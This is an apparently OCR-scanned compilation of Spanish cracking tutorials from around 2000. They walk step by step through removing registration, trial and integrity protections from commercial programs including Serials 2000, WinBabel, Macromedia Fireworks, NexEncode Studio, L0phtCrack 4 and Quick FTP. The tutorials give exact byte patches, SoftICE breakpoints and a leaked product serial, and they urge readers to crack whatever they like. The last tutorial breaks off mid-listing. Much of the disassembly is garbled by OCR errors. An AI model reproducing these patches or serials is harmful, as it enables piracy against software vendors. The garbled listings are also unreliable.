groovy2600tyahoo.com.ar 


ESCRITO MARTES 2 de Febrero a las 4:04 de la maniana!!!! 


CRACKEANDO SERTALS 2000 


Espero que no se hallan salteado todas las explicaciones por que no me gustaria crear 
larvas que lo unico que hacen es seguir los pasos del tutorial como lelos sin entender 
nada OK? 


Bueno, esta parte del cracking, (aunque digan que es para lammers, malors o algo de 
eso) es la que mas importa, ya que es facil, eficiente (yo logre crackear cientos de 
programas conocidos con esta tecnica aunque no lo crean), aparte al ser la que 
primero se aprende y es facil, es la que te hara emocionar, y te dara la experanza de 
que va a poder aprender a crackear, que no es tan dificil, etc. 


El metodo que voy a explicar consta de: 

Ubicar por medio de las String References (o de una busqueda de texto) es cartelito 
que te dice que el codigo no es valido. Luego vuscar unas referencias al codigo y 
cambiar un jne por un je (esto no funciona siempre con todos los programas (proba 
con el Mirc y vas a ver) solo funciona con aquellos que al pasar a la Nag de 
felicitaciones crean una entrada en el registro o un fichero que llaman cada ves que se 
ejecutan para ver si estan o no registrados) 


Bueno todo esto lo vamos a pasar a practico con el serials 2000 (vieron que es el 
mejor programa de serials y la proteccion de mierda que le pusieron???) 


Paso 1: 

Desensamblemos el serials 2k. 

Paso 2 

Abramos el serias 2k y vallamos a File/Administration tools 

Una ves ahí pongan cuaquier password, y veran que les sale esta ventana: 


waring ES 


Incorrect Password 


Apunten en su cuaderno del cracker la string Incorrect Password. 
Paso 3: 

Busquemos la string que anotamos “Incorrect Password” 
Aterrizamos aca: 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:00402940(C) 
l 


* Possible StringData Ref from Data 0b3j ->"larning" 
| 


:004029F4 68B83834100 push 004183B3 
| 

:004029F9 6844834100 push 00418344 

:0040Z29FE 6400 push 00000000 


* Reference To: USER32.MessageBoxA, Ord:0195h 
| 
:00402A400 FF1528374100 Call dword ptr [00413728] 


Paso 4: Ahora miren, donde dice Referenced by a ......... at Address: 004029A00, 
Esto quiere decir que el mensaje fue llamado por un jump condicional o incondicional 
desde la direccion 004029A0. 

Lo que nosotros tenemos que hacer es ir a esa direccion apretando el boton GO TO CD 
LOCATION y poniendo 00402940 

Una ves que lo pusimos aparecemos aca: 


:0040299E 85c0 test eax, eax 

200402942 8D4C2404 lea ecx, dword ptr [esp+04] 
:00402946 ESS55EGFFFF call 00401000 

:004029AB 8D4C2400 lea ecx, dword ptr [esp] 
:0040294F Có684249401000001 mov byte ptr [esp+00000194], Ol 


* Reference To: MFC42.0Ordinal:09D2, Ord:09DZh 
l 


:004029B7? ESBCDS0000 Call 00410278 
:004029EC 8D38C24A40000000 lea ecx, dword ptr [esp+00000040] 
200402903 Có6s4249401000003 mov byte ptr [esp+00000194], 03 


* Reference To: MFC42.0Ordinal:0320, Ord:0320h 
l 


:004029CB ESCED90000 Call 0041039E 
:004029D0 8D4C2460 lea ecx, dword ptr [esp+60] 
:004029D4 Cós4249401000002 mov byte ptr [esp+00000194], 02 


* Reference To: MFC42.0Ordinal:0261, Ord:0261h 
MÍ : 

Line:4152 Pg 83 and 84 of 772 Code Data (2:00402940 (20ffset 00001DA0h in File:Serial2k.exe 
Vemos que hay un test que seria como una comprovacion entre dos registros eax y 
eax y (los registros son sectores de memoria utilizados para guardar datos p ej 
numeros de serie etc) si son iguales nos manda a el mensaje de error. 
Ahora lo que tenemos que hacer es ir a el HexWorksHop y cambiar 7452 por 7552 (no 
lo podes cambiar en cualquier lado fijate en el offset ¿YA LO EXPLIQUE ARRIBA)? 
Bueno una ves cambiado guarda el archivo como Serial2k_Cracked.exe y probalo!!! 
VAMOS A VER SIN FUNCIONO!!! 


WinBabel V4.2 (Pac) 
CRACKER: “DeeJay”* 


Proteccion: Limitacion de Tiempo Funciona 5 minutos si y 5 no Proteccion de Integridad 
(No poder modificar el ejecutable) 

URL: www.winbabel.com. 

Herramientas: W32Dasm + SOFTICE + Hworks32 


INTRODUCCION 


Hora 00:00 es la hora de hacer algo para no aburrirme: 

Ojeando un cd que tengo por aqui entre todos mis trastos, veo un programilla en la sección 
traductores, y tras leer la descripcion creo que puede ser entretenido. 

Se trata de un programa que traduce todos los menus de todos los programas de win, asi 
como lo que copiemos al portapapeles, y para mas colmo las paginas web, y todo en tiempo 
real, claro que esto relentiza un poco la maquina por que tiene que ir traduciendo. 


AL ATAKE 


Pues nada manos a la obra... 
ler contacto 

Lo primero sera buscar al go que nos llame la atención, ejecutamos el programa, y ojeamos, 
UMMMMMNM... 

nos damos cuenta de varias cosas, por ejemplo que no se registra mediante numero de serie, 
y que en la parte superioi pone winbabel(PAC), osea que el texto PAC no tiene que aparecer 
en la version registrada. 

Bien sigamos atentos, que pasa cuando se cumplen los primeros 5 minutos... bien vemos que 
nos sale una bonita pero molesta nag diciendo que esta Winbabel PAC traduce 5 minus si 5 
minutos no..... 

Bien ya tenemos por donde empezar. 

Al atakerr 

Cargamos el W32Dasm y buscamos la cadena Winbabel PAC: 

* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 

1:0003.5F4F(U), :0003.5F83(C), :0003.5F8A(C), :0003.5F99(C) 

| 

:0003.5FAO 837E0A00 cmp word ptr [bp+0A], 0000 

:0003.5FA4 7427 je SFCD 

:0003.5FA6 837EFEO01 cmp ward ptr [bp-02],.0001 


13 de julio de 2003 
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:0003.5FAA 7521 ¡ne 5FCD 


* Possible Reference to Dialog: DialoglD_0001, CONTROL_1D:0004, "No registrado!!" 
| 

:0003.5FAC 6A04 push 0004 

:0003.5FAE 16 push ss 


* Possible StringData Ref from Data Seg 064 -"WinBabel PAC (Probar Antes de " 
-"Comprar)" 

| 

:0003.5FAF 688DO0C push 0C8D 

:0003.5FB2 16 push ss 


* Possible StringData Ref from Data Seg 064 -"WinBabel PAC traduce 5 minutos " 
-"siy 5 no." 

| 

:0003.5FB3 68C10B push 0BC1 

:0003.5FB6 OE push cs 

:0003.5FB7 E8D8F9 call 5992 

:0003.5FBA 83C40A add sp, 000A 

:0003.5FBD 3D0600 cmp ax, 0006 

:0003.5FCO 750B ¡ne 5FCD 

:0003.5FC2 16 push ss 


* Possible StringData Ref from Data Seg 064 -"registro.exe" 
| 

:0003.5FC3 68B40C push 0CB4 

:0003.5FC6 6A05 push 0005 

:0003.5FC8 9AFFFF0000 call KERNEL.WINEXEC 


Si nos fijamos en las condicones tenemos una incondicional y varias condiciones, y a juzgar 
por las direcciones estan muy juntas vamos a verlas... 


:0003.5F7C 9AFFFF000O0 call 0001.0E8Eh 

:0003.5F81 0BD2 or dx, dx 

:0003.5F83 7C1B j¡l SFAO 

:0003.5F85 7FOS jg 5F8C 

:0003.5F87 3D0500 cmp ax, 0005 

:0003.5F8A 7614 jbe SFAO 

* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0003.5F85(C) 

| 

:0003.5F8C 16 push ss 

* Possible StringData Ref from Data Seg 064 -"WinBabel.exe" 
| 

:0003.5F8D 68B40B push 0BB4 

:0003.5F90 OE push cs 
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:0003.5F91 E81FFE call 5DB3 

:0003.5F94 83C404 add sp, 0004 

:0003.5F97 OBCO or ax, ax 

:0003.5F99 7405 je SFAO 

:0003.5F9B C746FE0100 mov word ptr [bp-02], 0001 

Exactamente unas lineas mas arriba tenemos toas las condiciones vamos a estudiarlas 
Si nos fijamos en las primeras lineas que hemos puesto, vemos que el mensaje nos sale 
siempre que vamos a la dirección 

0003:5FAO 


A si que ya sabemos donde no tiene que ir. Tenemos en las lineas 


:0003.5F83 7C1B jl SFAO 
:0003.5F85 7FOS jg 5F8C 
:0003.5F87 3D0500 cmp ax, 0005 
:0003.5F8A 7614 jbe SFAO 


* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0003.5F85(C) 

| 

:0003.5F8C 16 push ss 

* Possible StringData Ref from Data Seg 064 -"WinBabel.exe" 

| 

:0003.5F8D 68B40B push 0BB4 

:0003.5F90 OE push cs 

:0003.5F91 E81FFE call 5DB3 

:0003.5F94 83C404 add sp, 0004 

:0003.5F97 OBCO or ax, ax 

:0003.5F99 7405 je SFAO 

Bien una vez estudiado esto pasemos a ver el codigo del mensaje: 

* Referenced by a (U)nconditional or (Cjonditional Jump at Addresses: 
1:0003.5F4F(U), :0003.5F83(C), :0003.5F8A(C), :0003.5F99(C) 

| 

:0003.5FAO 837E0A00 cmp word ptr [bp+0A], 0000 

:0003.5FA4 7427 je 5FCD 

:0003.5FA6 837EFE01 cmp word ptr [bp-02], 0001 

:0003.5FAA 7521 ¡ne 5FCD 


* Possible Reference to Dialog: DialoglD_0001, CONTROL_1D:0004, "No registrado!!" 


| 
:0003.5FAC 6A04 push 0004 


:0003.5FAE 16 push ss 


* Possible StringData Ref from Data Seg 064 -"WinBabel PAC (Probar Antes de " 
-"Comprar)" 
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muy bien pues una vez visto esto... 

llegamos a la conclusionde que hay que obligarle a entrar y despues obligarle a ir a la 
dirección buena 

Cambiamos la linea: 

:0003.5F83 7C1B jl SFAO 

cambiando el 5F83 por EB1b --- JUMP 

Obligamos a saltar a la buena en: 

:0003.5FA4 7427 je SFCD 

cambiando 5Fa4 por EBA4 -- JUMP 

Bueno ejecutamos el progama y vemos que funciona correctamente escepto una nag que nos 
sale al principio que pone NOTA:Esta copia de winbabel, bla bla bla... 

Vamos a ocuparlenos de ella buscamos en el W32Dasm y... bingo 


e  Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:0003.7852(C) 
| 
:0003.7869 837EF800 cmp word ptr [bp-08], 0000 
:0003.786D 743F je 78AE 
:0003.786F 6AFF push FFFF 
:0003.7871 9AFFFF0000 call USER. MESSAGEBEEP 
:0003.7876 6A00 push 0000 
:0003.7878 16 push ss 
* Possible StringData Ref from Data Seg 064 -"NOTA: Esta copia de WinBabel no " 
"est" 
| 
:0003.7879 681811 push 1118 
:0003.787C 16 push ss 


* Possible StringData Ref from Data Seg 064 -"WinBabel" 


Pues cambiemos 743F por EB3F 
Y para dejar las cosas bien hechas no nos vamos a conformar con esto, quitaremos el texto 
PAC que nos sale en la arte de arriba de la aplicacion, buscamos winbabel 4.2(PAC) 


e Possible StringData Ref from Data Seg 064 -"WinBabel.exe" 
| 
:0003.5ED1 687E0B push 0B7E 
:0003.5ED4 OE push cs 
:0003.5ED5 ESDBFE call 5DB3 
:0003.5ED8 83C404 add sp, 0004 
:0003.5EDB OBCO or ax, ax 
:0003.5EDD 7415 je SEF4 
:0003.5EDF 6A00 push 0000 
:0003.5EE1 16 push ss 
* Possible StringData Ref from Data Seg 064 -"WinBabel 4.2 (PAC)" 
| 
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:0003.5EE2 688B0B push 0B8B 
:0003.5EE5 FF7608 push word ptr [bp+08] 
:0003.5EE8 FF7606 push word ptr [bp+06] 
:0003.5EEB OE push cs 

:0003.5EEC E871FF call 5E60 
:0003.5EEF 83C40A add sp, 000A 
:0003.5EF2 EB13 ¡mp 5F07 

* Referenced by a (U)nconditional or (Cjonditional Jump at Address: 
1:0003.5EDD(C) 

| 

:0003.5EF4 6A00 push 0000 

:0003.5EF6 16 push ss 

Cambiaos la linea: 

:0003.5EDD 7415 je SEF4 

por EB15 


Bueno pues cuando creemos que todo esta logrado, nos damos cuenta que al ejecutar el 
fichero nos da un error, " El fichero winbabel.exe ha sido modificado", merdé, jejej, bueno 
continuemos pues... 

Buscamos algun detalle que nos diga donde esta esa proteccion de integridad, pero pensando 
llegamos a la conclusion que es mas sencillo tirrar del Softlce, y así no perdemos tiempo 
XD.. 

Pues venga, arrancamos el Softlce, ejecutamos el loader y cargamos el programa, lo 
ejecutamos y aparecemos en el Soft, pulsamos CTRL+D, y nos vuelve al programa ¡;¡¡ 
meeee !!! suena la proteccion, y sin quitarla pulsamos CTRL+D para volver al Soft, vamos a 
poner un Break, or ejemplo por que no ponemos uno cuando desaparezca el mensaje, 
vamos... 


Tecleamos en Soft: 
HWND 
nos aparece la lista y buscamos nuestro programilla osea WINLABEL 


0c64 xxxxxx xx WINLABEL xxxxXxxXxX 
0c64(2)xxxxx xx WINLABEL BUTTON 


OK, ya tenemos la ventana pillada por los innombreables, jejeje ahora ponemos un BREAK 
cuando desaparezca... 

bmsg 0c64 wm_destroy 

volvemos al programa y pulsamos el botón y.... Bingoooo. 

Salramos al Soft, si te fijas en la barra vende que hay encima de la linea de comando veras 
que pone USER(), esta es justo la zona que nos nos vale para nada, pulsamos F12, hasta 
llegar a la zona donde pone WINBABEL, aqui sí. 


Como es un programa a 16 bit no tenemos ni papas, del offset, asi que anotamos una 
fraccion para luego buscarla en el w32dasm, anotamos: 
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XXxx:00F1 9400007F17 CALL USER. MESSAGEBOX 
XXXX:0024 GAFE PUSH XXXXXX 
XXXX:0026 CALL XXXXXXX 


Vamos al W32Dasm y buscamos por ejemplo G6AFE 
La primera aprada no nos dice nada pero la segunda llegamos a... 


:0008.001B 6A00 push 0000 

:0008.001D 6A00 push 0000 

:0008.001F 9AFFFF0000 call USER.IMESSAGEBOX 

:0008.0024 6AFE push FFFE 

:0008.0026 9AFFFF000O call 0001.0D48h 

:0008.002B 59 pop cx 

:0008.002C 1F pop ds 

Ummmmm, esto nos suena... ok pues vamos osea que este es el codifo que comprueba la 
integridad, muy bien camos a ver quien lo llama, subimos arriba y ... 


Referenced by a CALL at Addresses: 

1:0008.0085, :0008.01CE, :0008.0274 

pues nada aqui tenemos nuestras llamada ahora solo tenemos que eliminarlas buscamos 
0008:0085, 01CE y 0274 

0008.0085 E878FF call 0000 sustituimos ES78FF por 909090 

0008.01CE E82FFE call 0000 sustituimos ES2FFE por 909090 

0008.0274 E889FD call 0000 sustituimos ES89FD por 909090 


Bueno pues con esto solucionamos el problema de integridad, ahora ya tenemos nuestro 
programa oeprativo. 
Agradecer a MrCrimson, por sus animos, y como no a Karpoff, por su escelente trabajo. 


PAra cualquier duda aqui me teneis 
Saludos “DeeJay” 2000 


Como crackear el Macromedia Fireworks 3 


Hola amigos, como andan? Bien espero. Bueno hoy vamos a ver como crackear el 
Fireworks ya que como el Dreamweaver es casi lo mismo nos va a servir para practicar 
el manejo del SICE. 


Bueno como en el otro tuto nos vamos a Buy y ponemos todos los datos, después en 
la otra ventana que aparece, ponemos go off- line o algo asi para que no nos tengamos 
que conectar etc ect. 

Ok ahora se habilito la pantalla para ingresar el Unlocking Code, que como deven 

saber tiene que ser de 10 caracteres ya que si no lo es no pasa la comprobación. Un 
buen codigo puede ser abcdefghij o 1234567890, el que a uds les guste. Ok una vez 
puesto (con el SICE cargado) el Unlocking code, apretamos ctrl.+d y nos vamos al sice 
a poner un BPX, esta ves usaremos un bpx getdlgitemtexta como el Dreamweaver a 
ver si funciona. Y como pueden ver al apretar F5 y Ok nos salta el SICE, apretamos 
F11 para ir al codigo que llamo a la funcion Getdlgitemtexta y vemos algo igualito al 
Dreamweaver: 

Un push que nos pone nuestro Unlock kode falso, otras voludeces mas y al final un 
CMP OA y un JZ (JE) o sea que compara si nuestro U/C tiene 10 digitos o letras y si no 
tiene 10 sigue hacia un error asi que a nosotros nos va a saltar. 

Una ves que aterrizamos vamos viendo cuales son los registros que van cambiando, 
EAX ECX EDX etc. Generalmente cambian después de algo sospechoso como un CALL 
un PUSH etc asi que vos anda fijandote cuales son, y como deven saber el que cambia 
es EAX después de la segunda Call (CALL EN LA QUE SE GENERA EL U/C PARA LOS 
KEYINGENIERS) y nos tira un string como esta: YFYFED] YMC 

Y como ven es una string de 10 letras y la tenemos que provar. 

Algo que les puedo decir es que los productos macromedia usan una protección entr 
comillas llamada Sales Agent, que es muy popular pero no sirve para nada, ya que, 
como ven es muy facil de reventar. 


Serial de el Fireworks: 
FWW300- 65137-37255-19336 


Tambien prove este mismo metodo con el Drumbeat 2000 y funciono ya que es 
idénticamente igual, asi que prueben con todos los demas. 


E-mail: groovy26000yahoo.com.ar 


Web: www.zencracking.com.ar 
Grupo: [zCt!] 


Como crackear el Crackme 1 by Daniel-R]J 


Download http://www.iespana.es/cracksam/CraCks/danielc.zip 
Coder Daniel- RJ 


Hola aca estoy de vuelta con un Nuevo manual, esta ves es para crackear un crackme 
que me pareciomedio raro. Lo baje de la web de SerialCodex y como vi que tenia un 
manual, pero este no me gustaba (nahh ta guenisimo) decidi hacerlo yo. Pero de una 
forma diferente, ya que el noopeo y yo busque el serial. 


Bueno mi forma de crackearlo es la siguiente: 

Primero abrimos el ejecutable con el Languaje 2000, y vemos que es un proggie hecho 
con Delphi, asi que vamos biendo que bpx poner. Luego vemos que no esta 
comprimido, asi que vamos a el W32Dasm, una ves alli, dejamos que termine y 
abrimos el ejecutable. 


Uhmm, que raro es, vamos a File/About, damos ok y luego vamos a Dam! Where ls 
the whole Thing!!!. Ahora si esta el crack, bueno ponemos nuestro nombre (grO0Ovy) y 
un numero (123123123). Le damos a Check It! Y vemos esto: 


Crackmel El 


No no nol :( Try again! 


Bueno anotamos esa frase y ahora vamos al W32Dasm, ponemos para ver las String 
References y buscamos la cadena No no no! 6 Try again!: 
La encontramos aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 

|:0042D56F(C) 

* Possible StringData Ref from Code Obj - >"No no no! :( Try again!" 
| 

:0042D57D B810D64200 mov eax, 0042D610 

:0042D582 E871FBFFFF call 0042DOF8 


Uhmmm pero que hay mas arriba? 
:0042D56A E86163FDFF call 004038D0 
:0042D56F 750C j¡ne 0042D57D 


* Possible StringData Ref from Code Obj - >"Congratz cracker! hehehe" 


:0042D571 B8ECD54200 mov eax, 0042D5EC 
:0042D576 ES7DFBFFFF call 0042D0F8 
:0042D57B EBOA jmp 0042D587 


Ok como vemos la call en 0042D56A es la que se encarga de comprobar/comparar el 
serial number. Tonces hacemos esto. Anotamos la dirección (0042D56A) y ahora 
cargamos el sice. 


Una ves cargado el sice vamos a simbol loader y cargamos el ejecutable, le damos 
load y aparecemos en el sice. Apretamos ctrl. + d y salimos del sice. Ahora habilitamos 
los menus del crackme e ingresamos otra ves los datos (gr00vy y 123123123). Ahora 
pasamos al sice con un ctrl. + 

D y ponemos un bpx getwindowtexta ya que es el que mas se usa en las aplicaciones 
de Delphi. Otra ves ctrl. + d para salir del sice y le damos a Check It!. Inmediatamente 
saltamos al sice. Aca apretamos F11 para ira al codigo del Crackme y paramos en el 
codigo del crackme, una ves en el code del crackme tecleamos g 0042D56A pero no 
pasa nada, solo nos vamos del sice, pero ese es el caso, que salgamos y que cuando lo 
volvamos a pulsar al boton de Check It vallamos a la dirección deseada, asi que 
apretamos de buelta Check It y aparecemos en la call que genera el codigo, asi que 
F8 para entrar enla call y vamos sondeando registros, 

Uhmmm que veo un CMP EAX, EDX que tendrán en el interior? Bueno para saber 
hacemos d eax y vemos que tiene nuestro serial, y un d EDX tiene nuestro serial 
valido!!!! Que es lw55f- 


Bueno espero que les halla gustado y que me mande algun saludito de ves en cuando 
al mail, como para agradecer? Saludar? Bueno chasu! 


Cracker: gr0O0Ovy 

E- mail: groovy26000yahoo.com.ar 
WEB: ¡ 

TEAM: zCt! 


Como crackear el NexEncode 
Studio 


Uhmmm vamos al grano ya que no tengo ganas de introducir a nada. 


Abrimos el W32Dasm y cargamos el archivo nexencode.exe, una ves desensamblado ejecutamos 
el NexEncode Studio y vemos que aparece en la barra de tray, asi que, hacemos un clic derecho 
en el iconito y vamos a Tools/Options allí vamos a Register y vemos esta pantalla: 


ES 
| Register NexENCODE 


Encoder 
Name: [groDvy 
Ripper | Password: [234234 


CDDB | Register 
[ Price: $20.00 American ] 
aneral | Register by mail: 
l Send check, cash, or money 
Players order with e-mail address 
and/or street address to... 
Register | 
Leon Alossa 


878 N Pascal Street 
St. Paul, MN, 55103 


This session only 4 3] Cancel 


Introducimos algunos datos y vemos ke pasa si le damos a Ok, nos aparecen 2 nags no 1, esto 
lo hacen para despistarnos, pero nosotros no somos tontos y vamos a ver que hacemos pero eso 
en tiempo de cracking o sea en el momento ; ) 


Bueno el primer dialogo decia una cosa mas o menos asi: 


"NexENCODE Studio could not register by itself” 
asi que buscamos esa estring y vemos que esta!!! Asi que vemos que hay : 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :005D9A57 (C) 


:OO5D9ABB 66833DB4E06300FF cmp word ptr [0063E0B4], FFFF 
:005D9AC3 0F855E010000 jne 005D9C27 


* Reference To: MSVBVM60.__ vbaStrCat, Ord:0000h 


:005D9AC9 8B3D5C104000 mov edi, dword ptr [0040105C] 
:005D9ACF B904000280 mov ecx, 80020004 
:005D9AD4 B80A000000 mov eax, 0000000A 


* Possible StringData Ref from Code Obj ->"NexENCODE Studio could not register " 


—>"itself." 


:005D9AD9 681C804D00 push 004D801C 
:O005D9ADE 68246F4D00 push 004D6F24 


Huyyyy que vemos que este dialogo es llamado por 005D9A57, vamos alla a ver que onda! : 


* Reference To: MSVBVM60.__ vbaStrCmp, Ord:0000h 
| 


:005D9A4F FF15E8104000 Call dword ptr [004010E8] 
:005D9A55 85C0 test eax, eax 
:005D9A57 7562 j¡ne OOS5D9ABB 


Juaz una llamada a __ vbaStrCmp la funcion de comparacion en aplicaciones VB!!! 
Tamos en el lugar correcto!!! Uhm para mi que noopeando el JNE vamos a ver el dialog 
de Thanks for.... a ver noopeamos y.... NOOOOO no es tan tonto el proggie pero no se 
preocupen que es facil!!! 


Vamos de vuelta a el W32Dasm y buscamos algo como esto en las String References Thanks o 
registering etc. Vemos que encontramos casi a lo ultimo: 


"Thanks for registering!" 

"The effects editor was unable " 
"There are" 

"Track = 0, cannot continue" 


uhmm 2 clic y vamos a parar aca: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0061F'97D (C) 


:0061F991 8D4DD4 lea ecx, dword ptr [ebp-2C] 


* Reference To: MSVBVM60.__vbaFree0b3, Ord:0000h 


:0061F994 FF1540124000 Call dword ptr [00401240] 
:0061F99A 8B16 mov edx, dword ptr [esi] 


ACA VAN MAS DATOS QUE NO INTERESAN 


* Possible StringData Ref from Code Obj ->"Thanks for registering|!" 


:0061F9AC 6844CB4D00 push 004DCB44 
:0061F9B1 57 push edi 


Uhmmm tenemos que ver si hay mas de 1 referencia a Thanks for registering! asi que 
hacemos clic otra ves en las String References y vemos que no solo hay mas de 1 sino que son 
3, tonces lo que tenemos que hacer es: 


Como en la primera no se si notaron que les marque: 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0061F'97D (C) 


bueno todo tiene una razon es por que desde ahí es llamado el dialogo!!! Tonces lo que tenemos 
que hacer es ir para alla y ver que hay (uds se tienen que fijar en las 3 yo les muestro solo la 
primera ya que son todas iguales): 


:0061F97D 7D12 jge 0061F991 
:0061F97F 688C000000 push 0000008C 
:0061F984 683CBD4D00 push 004DBD3C 


Aca paramos, es un jge y seguido de 2 push” s que sospechoso, mejor lo noopeamos al] GE asi 
se pushean ls instrucciones (que de seguro son el nombre y el numero de registro nuestro) 


WEB: [www.zencracking.com.ar 


E-mail: ¡groovy26000yahoo.com.ar 
Grupo: [zCt!] 


Como crackear el LOpthCrack 4.0 


Hola a todos, hoy estamos de vuelta con el LC pero en la ultima versión!!! Así que 
ahora aprenderemos a crackearlo fácilmente. 


Primero, esta es una excelentísima aplicación para recobrar/crackear passwds de los 
NT's o 2000's. La verdad que es impecable, pero su protección deja mucho que desear. 


Bueno, lo primero es instalarlo e investigarlo, asi que una ves instalado lo ejecutamos 
y vemos que nos aparece una ventanita como esta: 


LC4 Trial Version Ñ x 


(Ostake LC 4 


PASSWORD AUDITING AND RECOVERY 


li 5 Days until trial version will expire. 


E Register Help | 


Uhmm pinto como la ultima versión que era mas o menos lo mismo. Bueno, nos vamos 
a Register y nos aparece: 


Register q xj 
Serial Number: hi ed479cce? 
Unlock Code: TR 


You must register the software to receive an unlock code. 
Register at: 
http: +4wwww atstake. comélc*register. htrol 


If you are already registered and are reinstalling, go to: 
http: ¿4wwww atstake. com?Ic*reinstall htonl 


Cancel 


Uhmmm esto pinta a MessageBoxA, pero probemos. Ponemos un unlocking code on 
1234567890 y vemos que nos tira... 


Cs 


A You have entered an invalid code. Please try again. 


Listo, ya tenemos la mitad del programa crackeado, es una messagebox!!! Bueno 
abrimos el W32Dasm y desensamblamos, luego vamos a String References y 
buscamos la string You have enteres a invalid code. Please try again. La encontramos 
abajo del todo. 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :00411C0B(C) 


:00411C30 53 push ebx 
:00411C31 53 push ebx 


* Possible StringData Ref from Data Obj ->"You have entered an invalid 
code. " 
->"Please try again." 


:00411C32 6800144700 push 00471400push 00471400 


Uhmmm ke dice por ahi arriba, Referenced by a (U)nconditional r(C)onditional Jump at 
Address: 00411C0B(C). 


O sea que esta string es llamada por un salto condicional desde la direccion 00411C0B. 
Tonce vamos alla y vemos que hay: 


:00411C01 E8955C0100 call 0042789B 

:00411C06 83C410 add esp, 00000010 

:00411C09 85C0 test eax, eax 

:00411C0B 7523 jne 00411C30 <---- PARAMOS ACA 
:00411C0D 8B07 mov eax, dword ptr [edi] 
:00411C0F 50 push eax 


Como ven ese salto es mas sospechoso que la mierda!!! Vamos a noopearlo ya que si 
este salto se ejecuta, nos va a llevar al Mensaje que nos dice que tenemos que 
ingresar un Codigo correcto. Tonces abrimos el HexWorkShop y vamos al offset 11C0B 
y cambiamos el 7523 por 9090, lo gurdamos como LC4 Cracked.exe y luego lo 
abrimos y vamos a la seccion de registrar e ingresamos cualquier cosa y.... 


Cs 


AN You have successfully registered LC4, 


Bien, ya crackeamos una parte ya que pienso que al volver a abrirlo nos va a aparecer 
la nag de nuevo, tonces vamos a ver donde mas comprueva que estamos o no 
registrados. 


Bueno habiamos dejado en : 


:00411C01 E8955C0100 call 0042789B 
:00411C06 83c410 add esp, 00000010 
:00411C09 85C0 test eax, eax 
:00411C0B 7523 jne 00411C30 


A mi me parece que esa es la rutina de comprobación asi que vamos a ver que es lo 
que tiene adentro: 


* Referenced by a CALL at Addresses: 
|:00411983 , :00411C01 , :0042725C , :0042726D , :0042727E 
:0042728F 


:0042789B 55 push ebp 
:0042789C 8BEC mov ebp, esp 
:0042789E 83ECOC sub esp, 0000000C 
:004278A1 833DFC336B0000 cmp dword ptr [006B33FC], 00000000 
:004278A8 53 push ebx 
:004278A9 56 push esi 
:004278AA 57 push edi 
:004278AB 7512 jne 004278BF 
:004278AD FF750€ push [ebp+0C] 
:004278B0 FF7508 push [ebp+08] 
:004278B3 E8C8690000 call 0042E280 
:004278B8 59 pop ecx 

:004278B9 59 pop ecx 

:004278BA E96C010000 jmp 00427A2B 


Como vemos esta call es muy solicita ya que la llaman desde todas estas direcciones: 
00411983, 00411C01 (esta no va ya que es la call donde estamos nosotros y ya la 
noopeamos), 0042725C, 0042726D, 0042727E y 0042728F. 


Como ven esta muyyyvyvy llamada de otros lugares y entonces vamos a ver que 
pasa en esos lugares ok? Vamos a por ej 00411983: 


:00411983 E8135F0100 call 0042789B 

:00411988 83C410 add esp, 00000010 

:0041198B 85C0 test eax, eax 

:0041198D 7506 jne 00411995 <- - - Que raro no? La 


noopeamos?? SITITTI!!! 


Nopeemos ese jne a ver que pasa, pero todavía no creo que sea ese solo asi que nos 
vamos a la siguiente dirección: 0042725C 


:0042725C E83A060000 call 0042789B 
:00427261 59 pop ecx 
:00427262 85C0 test eax, eax 
:00427264 59 pop ecx 


:00427265 7433 je 00427292 


Juaz otro je despues de una call y un test, esto me pinta facil!!! Noopeemoslo al je. 
Pero para ¡!! No seas asi mira las siguientes calls que estan abajo ahí cerquita por ej 
0042726D que es la siguiente call que nosotros teniamos que ver esta unas lineas mas 
abajo: 


:0042726D E829060000 call 0042789B 
:00427272 59 pop ecx 
:00427273 85C0 test eax, eax 
:00427275 59 pop ecx 
:00427276 7422 je 00427292 


Otra vez lo mismo. Noopemos!!! 


Y ahora nos queda la ultima call asi que vamos unas lineas mas abajo que esta cerca: 


:0042727E E818060000 call 0042789B 
:00427283 59 pop ecx 
:00427284 85C0 test eax, eax 
:00427286 59 pop ecx 
:00427287 7411 je 00427292 


Otra ves lo mismo, noopeemos y provemos el programa a ver que nos dice. 

Vamos a register, ponemos un numero, damos ok. Reiniciamos el programa, y vemos 
que no nos aparece la nag, vemos a About y vemos que esta el numerito que 
ingresamos asi que ya tamos registrados!!!! Que felicidad!!! 


Espero que les halla gustado ya que creo que es el primer tuto que se hace sobre esta 
versión de LC4. Bueno como siempre sean libres!!! Y crackeen lo que se les de la gana. 


WEB: www.zencracking.com.ar 


E-mail: groovy26000yahoo.com.ar 
Grupo: zCt! 


Cracker: gr0Ovy! 


Como crackear el Quck FTP 1.01 

Bueno aca estamos de nuevo, con un poco de retraso por que me cortaron el telefono asi que van a tener que esperar un poco mas de lo acostumbrado, ademas el server de portland esta andando para el culo. 

Bueno lo primero que hacemos es Abrir el programa con el Languaje 2k para ver en que esta codeado (VB, C++, etc) como vemos esta codeado en Visual C++, como no esta codeado en VB dejamos de lado la posibilidad de usar el Smart Check. 

Bueno ahora abrimos el programa y nos dice por todos lados que le tiremos guita, pero no queremos eso no? Vamos a la opcion About y pulsamos en Register ahi pones cualquier serial y... NAG!, anotamos el texto de la nag. ("Incorrect registration code") 


Luego pasamos a el desensamblado, abrimos W32Dasm y bamos a String References, lo buscamos y ahi esta: 


"Incorrect registration code" 
"Invalid directory for download, " 
"Path" 

"Please register this software " 
"Please register this software" 
"Please Register" 

"Register this software to enable " 
"Register" 


Hacemos 2click y vamos a parar aca: 
* Possible StringData Ref from Data Obj ->"Incorrect registration code" 


| 
:004050AD 68CCA44000 push 0040A4CC 
:004050B2 8BCE mov ecx, esi 
:004050B4 C7466000000000 mov [esi+60], 00000000 


Uhmmm vamos a ver que hay por arriba. 

* Possible StringData Ref from Data Obj ->"Error" 
:004050A8 68D8A34000 push 0040A3D8 
NADA 


* Possible StringData Ref from Data Obj ->"002-65201" 


| 
:00405080 6840424000 push 00404240 
:00405085 50 push eax 


